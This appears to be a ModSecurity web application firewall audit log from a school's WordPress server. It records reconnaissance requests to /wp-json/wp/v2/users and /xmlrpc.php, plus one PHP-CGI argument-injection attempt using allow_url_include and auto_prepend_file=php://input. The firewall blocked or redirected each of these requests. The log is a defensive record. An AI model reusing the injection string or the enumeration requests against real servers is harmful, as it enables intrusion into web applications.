Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3e4ae70-Z-- --100ea13d-A-- [08/May/2025:12:30:43 +0700] aBxBg8P9GxxPAbCroFbNSgAAAFA 103.236.140.4 44620 103.236.140.4 8181 --100ea13d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --100ea13d-C-- demo.sayHello --100ea13d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --100ea13d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746682243762377 4813 (- - -) Stopwatch2: 1746682243762377 4813; combined=3694, p1=461, p2=3031, p3=24, p4=25, p5=90, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --100ea13d-Z-- --d5a13f4e-A-- [08/May/2025:12:32:34 +0700] aBxB8sP9GxxPAbCroFbNTwAAAFY 103.236.140.4 44634 103.236.140.4 8181 --d5a13f4e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 157.10.78.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.10.78.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d5a13f4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5a13f4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746682354161375 3350 (- - -) Stopwatch2: 1746682354161375 3350; combined=1420, p1=482, p2=906, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5a13f4e-Z-- --fd3f0b20-A-- [08/May/2025:12:44:47 +0700] aBxEzo4K347NtBcwXKwG8AAAAJY 103.236.140.4 44728 103.236.140.4 8181 --fd3f0b20-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fd3f0b20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd3f0b20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746683086999303 3365 (- - -) Stopwatch2: 1746683086999303 3365; combined=1474, p1=482, p2=959, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd3f0b20-Z-- --4db88d70-A-- [08/May/2025:12:44:51 +0700] aBxE044K347NtBcwXKwG8gAAAI4 103.236.140.4 44732 103.236.140.4 8181 --4db88d70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4db88d70-C-- demo.sayHello --4db88d70-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4db88d70-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746683091634974 5246 (- - -) Stopwatch2: 1746683091634974 5246; combined=3991, p1=537, p2=3266, p3=27, p4=27, p5=79, sr=98, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4db88d70-Z-- --535aab54-A-- [08/May/2025:12:46:43 +0700] aBxFQ44K347NtBcwXKwG9AAAAJc 103.236.140.4 44738 103.236.140.4 8181 --535aab54-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 183.220.231.212 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 183.220.231.212 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --535aab54-C-- --535aab54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --535aab54-E-- --535aab54-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746683203183435 4902 (- - -) Stopwatch2: 1746683203183435 4902; combined=3107, p1=517, p2=2556, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --535aab54-Z-- --443aa258-A-- [08/May/2025:12:51:31 +0700] aBxGYys5rYyn3jlLjjK_kwAAANA 103.236.140.4 44842 103.236.140.4 8181 --443aa258-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --443aa258-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --443aa258-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746683491214654 2876 (- - -) Stopwatch2: 1746683491214654 2876; combined=1275, p1=431, p2=814, p3=0, p4=0, p5=29, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --443aa258-Z-- --ca89550c-A-- [08/May/2025:12:51:39 +0700] aBxGa8P9GxxPAbCroFbNVwAAAEM 103.236.140.4 44846 103.236.140.4 8181 --ca89550c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ca89550c-C-- demo.sayHello --ca89550c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca89550c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746683499771291 5352 (- - -) Stopwatch2: 1746683499771291 5352; combined=4080, p1=476, p2=3320, p3=33, p4=35, p5=152, sr=70, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca89550c-Z-- --a0c5f56d-A-- [08/May/2025:12:55:20 +0700] aBxHSCs5rYyn3jlLjjK_lgAAANE 103.236.140.4 44876 103.236.140.4 8181 --a0c5f56d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.71 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a0c5f56d-C-- demo.sayHello --a0c5f56d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0c5f56d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746683720696587 5482 (- - -) Stopwatch2: 1746683720696587 5482; combined=4153, p1=504, p2=3433, p3=29, p4=33, p5=91, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0c5f56d-Z-- --451ff47e-A-- [08/May/2025:13:16:22 +0700] aBxMNo4K347NtBcwXKwHKgAAAJU 103.236.140.4 45018 103.236.140.4 8181 --451ff47e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --451ff47e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --451ff47e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746684982598636 3523 (- - -) Stopwatch2: 1746684982598636 3523; combined=1504, p1=472, p2=1000, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --451ff47e-Z-- --73c83d6b-A-- [08/May/2025:13:16:29 +0700] aBxMPY4K347NtBcwXKwHKwAAAJE 103.236.140.4 45022 103.236.140.4 8181 --73c83d6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --73c83d6b-C-- demo.sayHello --73c83d6b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --73c83d6b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746684989092665 6094 (- - -) Stopwatch2: 1746684989092665 6094; combined=4374, p1=561, p2=3565, p3=44, p4=35, p5=98, sr=79, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73c83d6b-Z-- --4806186b-A-- [08/May/2025:13:20:12 +0700] aBxNHCs5rYyn3jlLjjK_pAAAAME 103.236.140.4 45042 103.236.140.4 8181 --4806186b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4806186b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4806186b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746685212298170 3221 (- - -) Stopwatch2: 1746685212298170 3221; combined=1403, p1=476, p2=896, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4806186b-Z-- --1383b42e-A-- [08/May/2025:13:20:25 +0700] aBxNKSs5rYyn3jlLjjK_pQAAANM 103.236.140.4 45046 103.236.140.4 8181 --1383b42e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.122 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1383b42e-C-- demo.sayHello --1383b42e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1383b42e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746685225299027 4788 (- - -) Stopwatch2: 1746685225299027 4788; combined=3751, p1=478, p2=3073, p3=23, p4=24, p5=90, sr=92, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1383b42e-Z-- --c6a05b7b-A-- [08/May/2025:13:45:26 +0700] aBxTBo4K347NtBcwXKwHQwAAAJI 103.236.140.4 45178 103.236.140.4 8181 --c6a05b7b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6a05b7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6a05b7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746686726282620 3186 (- - -) Stopwatch2: 1746686726282620 3186; combined=1395, p1=473, p2=891, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6a05b7b-Z-- --3cc8ab2e-A-- [08/May/2025:13:45:42 +0700] aBxTFo4K347NtBcwXKwHRAAAAJU 103.236.140.4 45182 103.236.140.4 8181 --3cc8ab2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3cc8ab2e-C-- demo.sayHello --3cc8ab2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cc8ab2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746686742551077 5280 (- - -) Stopwatch2: 1746686742551077 5280; combined=3592, p1=496, p2=2911, p3=34, p4=33, p5=70, sr=60, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cc8ab2e-Z-- --7ad53f3f-A-- [08/May/2025:13:52:54 +0700] aBxUxqcs1DvJ_HgMHE_ypAAAAAI 103.236.140.4 45226 103.236.140.4 8181 --7ad53f3f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ad53f3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ad53f3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746687174097398 3460 (- - -) Stopwatch2: 1746687174097398 3460; combined=1513, p1=529, p2=946, p3=0, p4=0, p5=38, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ad53f3f-Z-- --00ff1376-A-- [08/May/2025:13:53:11 +0700] aBxU16cs1DvJ_HgMHE_yqAAAAA4 103.236.140.4 45236 103.236.140.4 8181 --00ff1376-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.104 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --00ff1376-C-- demo.sayHello --00ff1376-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --00ff1376-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746687191022516 5170 (- - -) Stopwatch2: 1746687191022516 5170; combined=4175, p1=515, p2=3432, p3=31, p4=44, p5=91, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
